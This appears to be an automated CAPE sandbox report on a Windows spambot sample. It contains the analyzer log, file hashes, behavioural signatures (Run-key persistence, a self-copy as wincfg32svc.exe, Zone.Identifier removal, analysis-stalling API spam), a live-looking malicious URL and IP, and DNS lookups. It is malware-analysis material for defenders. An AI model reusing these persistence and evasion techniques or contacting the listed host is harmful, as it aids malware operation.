CAPE

Triggered CAPE Tasks: Task #29475: Extraction


Analysis

Category Package Started Completed Duration Options Log
FILE exe 2019-01-10 01:13:07 2019-01-10 01:16:48 221 seconds Show Options Show Log
route = internet
procdump = 1
2019-01-10 01:13:08,000 [root] INFO: Date set to: 01-10-19, time set to: 01:13:08, timeout set to: 200
2019-01-10 01:13:08,015 [root] DEBUG: Starting analyzer from: C:\qfkgiskqi
2019-01-10 01:13:08,015 [root] DEBUG: Storing results at: C:\uSxGnb
2019-01-10 01:13:08,015 [root] DEBUG: Pipe server name: \\.\PIPE\sayWvjWfKf
2019-01-10 01:13:08,015 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-01-10 01:13:08,015 [root] INFO: Automatically selected analysis package "exe"
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Browser
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Curtain
2019-01-10 01:13:08,265 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module DigiSig
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Disguise
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Human
2019-01-10 01:13:08,265 [root] DEBUG: Started auxiliary module Screenshots
2019-01-10 01:13:08,279 [root] DEBUG: Started auxiliary module Sysmon
2019-01-10 01:13:08,279 [root] DEBUG: Started auxiliary module Usage
2019-01-10 01:13:08,279 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-01-10 01:13:08,279 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-01-10 01:13:08,390 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe" with arguments "" with pid 2924
2019-01-10 01:13:08,390 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 01:13:08,390 [lib.api.process] INFO: 32-bit DLL to inject is C:\qfkgiskqi\dll\IIwaACP.dll, loader C:\qfkgiskqi\bin\uUFCimo.exe
2019-01-10 01:13:08,436 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2924
2019-01-10 01:13:10,448 [lib.api.process] INFO: Successfully resumed process with pid 2924
2019-01-10 01:13:10,448 [root] INFO: Added new process to list with pid: 2924
2019-01-10 01:13:10,526 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 01:13:10,526 [root] DEBUG: Process dumps enabled.
2019-01-10 01:13:10,526 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2924 at 0x74480000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 01:13:10,526 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe".
2019-01-10 01:13:10,526 [root] INFO: Monitor successfully loaded in process with pid 2924.
2019-01-10 01:13:10,542 [root] INFO: Announced 32-bit process name:  pid: 1636996
2019-01-10 01:13:10,542 [root] INFO: Added new process to list with pid: 1636996
2019-01-10 01:13:10,542 [lib.api.process] WARNING: The process with pid 1636996 is not alive, injection aborted
2019-01-10 01:13:11,463 [root] INFO: Process with pid 1636996 has terminated
2019-01-10 01:13:16,438 [root] DEBUG: set_caller_info: Adding region at 0x00300000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-01-10 01:13:16,438 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2019-01-10 01:13:16,438 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-01-10 01:13:16,486 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-01-10 01:13:16,502 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-01-10 01:13:16,502 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-01-10 01:13:16,502 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-01-10 01:13:16,502 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-01-10 01:13:16,516 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-01-10 01:13:16,532 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2019-01-10 01:13:16,532 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-01-10 01:13:23,584 [root] INFO: Disabling sleep skipping.
2019-01-10 01:13:25,642 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-01-10 01:13:25,674 [root] INFO: Announced 32-bit process name: wincfg32svc.exe pid: 2688
2019-01-10 01:13:25,674 [root] INFO: Added new process to list with pid: 2688
2019-01-10 01:13:25,674 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 01:13:25,674 [lib.api.process] INFO: 32-bit DLL to inject is C:\qfkgiskqi\dll\IIwaACP.dll, loader C:\qfkgiskqi\bin\uUFCimo.exe
2019-01-10 01:13:25,690 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2688
2019-01-10 01:13:25,690 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 01:13:25,690 [root] DEBUG: Process dumps enabled.
2019-01-10 01:13:25,690 [root] INFO: Disabling sleep skipping.
2019-01-10 01:13:25,706 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2688 at 0x74480000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 01:13:25,706 [root] DEBUG: Commandline: C:\Windows\750547060050\wincfg32svc.exe.
2019-01-10 01:13:25,706 [root] INFO: Monitor successfully loaded in process with pid 2688.
2019-01-10 01:13:25,706 [root] INFO: Announced 32-bit process name:  pid: 1636996
2019-01-10 01:13:25,706 [root] INFO: Added new process to list with pid: 1636996
2019-01-10 01:13:25,706 [lib.api.process] WARNING: The process with pid 1636996 is not alive, injection aborted
2019-01-10 01:13:25,783 [root] INFO: Process with pid 1636996 has terminated
2019-01-10 01:13:26,204 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2924
2019-01-10 01:13:26,204 [root] DEBUG: GetHookCallerBase: thread 2928 (handle 0x0), return address 0x0040398D, allocation base 0x00400000.
2019-01-10 01:13:26,204 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-01-10 01:13:26,204 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-01-10 01:13:26,204 [root] DEBUG: DumpProcess: Module entry point VA is 0x000042EF.
2019-01-10 01:13:26,204 [root] INFO: Added new CAPE file to list with path: C:\uSxGnb\CAPE\2924_8783239332613610412019
2019-01-10 01:13:26,204 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6a00.
2019-01-10 01:13:26,220 [root] DEBUG: DLL unloaded from 0x75140000.
2019-01-10 01:13:26,220 [root] INFO: Notified of termination of process with pid 2924.
2019-01-10 01:13:26,828 [root] INFO: Process with pid 2924 has terminated
2019-01-10 01:13:31,509 [root] DEBUG: set_caller_info: Adding region at 0x00300000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-01-10 01:13:31,539 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2019-01-10 01:13:31,555 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-01-10 01:13:31,571 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-01-10 01:13:31,571 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-01-10 01:13:31,571 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-01-10 01:13:31,586 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-01-10 01:13:31,601 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-01-10 01:13:31,618 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-01-10 01:13:31,634 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2019-01-10 01:13:31,634 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-01-10 01:13:40,572 [root] DEBUG: DLL loaded at 0x74850000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2019-01-10 01:13:40,604 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-01-10 01:13:40,650 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-01-10 01:13:40,665 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-01-10 01:13:40,681 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-01-10 01:13:40,681 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-01-10 01:13:40,697 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-01-10 01:13:40,759 [root] DEBUG: DLL loaded at 0x74810000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-01-10 01:13:40,822 [root] DEBUG: DLL loaded at 0x74800000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-01-10 01:13:40,838 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-01-10 01:13:41,585 [root] DEBUG: DLL loaded at 0x742E0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-01-10 01:13:41,648 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\profapi (0xb000 bytes).
2019-01-10 01:13:41,664 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-01-10 01:13:41,696 [root] DEBUG: DLL loaded at 0x74280000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-01-10 01:13:41,726 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\rasman (0x15000 bytes).
2019-01-10 01:13:41,726 [root] DEBUG: DLL unloaded from 0x74280000.
2019-01-10 01:13:41,726 [root] DEBUG: DLL loaded at 0x74270000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-01-10 01:13:41,726 [root] DEBUG: DLL loaded at 0x74260000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-01-10 01:13:41,726 [root] DEBUG: DLL unloaded from 0x75600000.
2019-01-10 01:13:41,726 [root] DEBUG: DLL unloaded from 0x747D0000.
2019-01-10 01:13:41,757 [root] DEBUG: DLL loaded at 0x74250000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-01-10 01:13:41,773 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-01-10 01:13:41,789 [root] DEBUG: DLL loaded at 0x741F0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-01-10 01:13:41,805 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-01-10 01:13:41,835 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-01-10 01:13:41,835 [root] DEBUG: DLL loaded at 0x741E0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-01-10 01:13:41,835 [root] DEBUG: DLL loaded at 0x741C0000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-01-10 01:13:41,851 [root] DEBUG: DLL loaded at 0x741B0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-01-10 01:13:41,867 [root] DEBUG: DLL unloaded from 0x74850000.
2019-01-10 01:13:41,867 [root] DEBUG: DLL unloaded from 0x741C0000.
2019-01-10 01:13:42,585 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-01-10 01:13:44,128 [root] DEBUG: DLL unloaded from 0x75600000.
2019-01-10 01:13:44,128 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-01-10 01:13:44,160 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-01-10 01:13:44,176 [root] DEBUG: DLL loaded at 0x741A0000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-01-10 01:13:44,191 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-01-10 01:13:53,926 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-01-10 01:13:54,144 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-01-10 01:13:54,144 [root] DEBUG: DLL unloaded from 0x741F0000.
2019-01-10 01:13:54,190 [root] DEBUG: DLL unloaded from 0x75600000.
2019-01-10 01:14:04,237 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-01-10 01:16:32,421 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-01-10 01:16:32,421 [root] INFO: Created shutdown mutex.
2019-01-10 01:16:33,436 [root] INFO: Setting terminate event for process 2688.
2019-01-10 01:16:33,451 [root] DEBUG: Terminate Event: Attempting to dump process 2688
2019-01-10 01:16:33,451 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-01-10 01:16:33,483 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-01-10 01:16:33,513 [root] DEBUG: DumpProcess: Module entry point VA is 0x000042EF.
2019-01-10 01:16:33,545 [root] INFO: Added new CAPE file to list with path: C:\uSxGnb\CAPE\2688_6833147103316110412019
2019-01-10 01:16:33,576 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6a00.
2019-01-10 01:16:33,950 [root] INFO: Shutting down package.
2019-01-10 01:16:33,950 [root] INFO: Stopping auxiliary modules.
2019-01-10 01:16:33,950 [root] INFO: Finishing auxiliary modules.
2019-01-10 01:16:33,950 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-01-10 01:16:33,950 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-01-10 01:13:08 2019-01-10 01:16:47

File Details

File Name 2019-01-08-spambot-malware.exe
File Size 159744 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 34a7433231c49fa349f75da7426ed65f
SHA1 72ebb653a8e3bccc4f019e2f5fbff5c8bb4e49ad
SHA256 4b9d5841d38b8658466dcaf409c34c0f6d2d1f9ecb64254391a4621465daf79b
SHA512 04d1d37786f5d2347452a9ad4139fd8636bf1eeb1065d194de478bc178e8857a4cec8343e4f0e77f536dfb74ed901061fdc1296284fac262c98ce9285f74dde7
CRC32 10875687
Ssdeep 1536:iUWCvW0XOVwp8OOzn5As9IQsOo1oUHnyoHOvM3D/ozfKiQUS80I8z57jQDzEBCq4:bW2WUOWG/z5ARQGrHbXUS7z57Co/Hg
TrID
  • 34.7% (.EXE) Win32 EXE PECompact compressed (generic) (41569/9/9)
  • 26.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 23.1% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 5.5% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 3.7% (.EXE) Win32 Executable (generic) (4508/7/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Download Download ZIP Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: 2019-01-08-spambot-malware.exe, PID 2924
A process attempted to delay the analysis task.
Process: wincfg32svc.exe tried to sleep 1391 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/wcslen
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/fscanf
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/wcscmp
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/atoi
DynamicLoader: msvcrt.dll/fgets
DynamicLoader: msvcrt.dll/strchr
DynamicLoader: msvcrt.dll/strcpy
DynamicLoader: msvcrt.dll/strcat
DynamicLoader: msvcrt.dll/strlen
DynamicLoader: msvcrt.dll/strstr
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/malloc
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/sprintf
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/feof
DynamicLoader: msvcrt.dll/fprintf
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: DNSAPI.dll/DnsQuery_A
DynamicLoader: DNSAPI.dll/DnsFree
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/GetTimeZoneInformation
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/CharUpperA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: 2019-01-08-spambot-malware.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/wcslen
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/fscanf
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/wcscmp
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/atoi
DynamicLoader: msvcrt.dll/fgets
DynamicLoader: msvcrt.dll/strchr
DynamicLoader: msvcrt.dll/strcpy
DynamicLoader: msvcrt.dll/strcat
DynamicLoader: msvcrt.dll/strlen
DynamicLoader: msvcrt.dll/strstr
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/malloc
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/sprintf
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/feof
DynamicLoader: msvcrt.dll/fprintf
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: DNSAPI.dll/DnsQuery_A
DynamicLoader: DNSAPI.dll/DnsFree
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/GetTimeZoneInformation
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/CharUpperA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: wincfg32svc.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
Drops a binary and executes it
binary: C:\Windows\750547060050\wincfg32svc.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://92.63.197.48/m/attachment.js
suspicious_request: http://icanhazip.com/
Performs some HTTP requests
url: http://92.63.197.48/m/attachment.js
url: http://icanhazip.com/
Looks up the external IP address
domain: icanhazip.com
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: wincfg32svc.exe (2688) called API NtClose 500152 times
Spam: 2019-01-08-spambot-malware.exe (2924) called API NtClose 500152 times
Installs itself for autorun at Windows startup
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
data: C:\Windows\750547060050\wincfg32svc.exe
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
data: C:\Windows\750547060050\wincfg32svc.exe
Creates a hidden or system file
file: C:\Windows\750547060050
file: C:\Windows\750547060050\wincfg32svc.exe
Operates on local firewall's policies and settings
Creates a copy of itself
copy: C:\Windows\750547060050\wincfg32svc.exe

Screenshots


Hosts

Direct IP Country Name
N 98.136.101.117 [VT] United States
Y 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States
N 147.75.40.2 [VT] United States

DNS

Name Response Post-Analysis Lookup
yahoo.com [VT] MX mta5.am0.yahoodns.net [VT]
MX mta7.am0.yahoodns.net [VT]
MX mta6.am0.yahoodns.net [VT]
mta5.am0.yahoodns.net [VT] A 66.218.85.139 [VT]
A 74.6.137.64 [VT]
A 98.136.101.117 [VT]
A 67.195.228.141 [VT]
A 67.195.229.59 [VT]
A 98.137.159.24 [VT]
A 98.137.159.28 [VT]
A 66.218.85.52 [VT]
icanhazip.com [VT] A 147.75.40.2 [VT]

Summary

C:\Users\user\AppData\Local\Temp\msvcr100.dll
C:\Windows\System32\msvcr100.dll
C:\Windows\system\msvcr100.dll
C:\Windows\msvcr100.dll
C:\Windows\System32\wbem\msvcr100.dll
C:\Windows\System32\WindowsPowerShell\v1.0\msvcr100.dll
C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe:Zone.Identifier
C:\Windows\750547060050\wincfg32svc.exe
C:\Windows\750547060050
C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe
C:\Windows\750547060050\msvcr100.dll
C:\Windows\750547060050\wincfg32svc.exe:Zone.Identifier
\Device\KsecDD
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe
\Device\KsecDD
C:\Windows\750547060050\wincfg32svc.exe
C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe:Zone.Identifier
C:\Windows\750547060050\wincfg32svc.exe:Zone.Identifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WinCfgMgr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
